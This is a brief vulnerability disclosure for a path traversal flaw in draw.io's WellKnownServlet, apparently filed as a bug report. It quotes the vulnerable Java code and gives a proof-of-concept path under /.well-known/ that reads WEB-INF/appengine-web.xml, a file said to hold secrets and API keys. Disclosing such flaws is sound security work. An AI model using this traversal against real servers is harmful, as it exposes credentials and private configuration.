# Description
The `WellKnownServlet` is vulnerable to path traversal.
This allows reading local files.
For example the files in `WEB-INF` that contain secrets and API keys can be read.
https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66
“`java
String uri = request.getRequestURI().replace(“/.”, “/”);
if (uri.toLowerCase().contains(“.json”))
{
response.setContentType(“application/json”);
}
// Serve whatever was requested from .well-known
try (InputStream in = getServletContext().getResourceAsStream(uri))
{
if (in == null)
{
response.sendError(404);
return;
}
byte[] buffer = new byte[8192];
int count;
while ((count = in.read(buffer)) > 0)
{
response.getOutputStream().write(buffer, 0, count);
}
response.getOutputStream().flush();
response.getOutputStream().close();
}
“`
# Proof of Concept
Access the following URL (replace “ with the actual host of the web application).
“`txt
/.well-known/…/WEB-INF/appengine-web.xml
“`
This will disclose the contents of `appengine-web.xml`:
“`xml
truefalsejava8F11
“`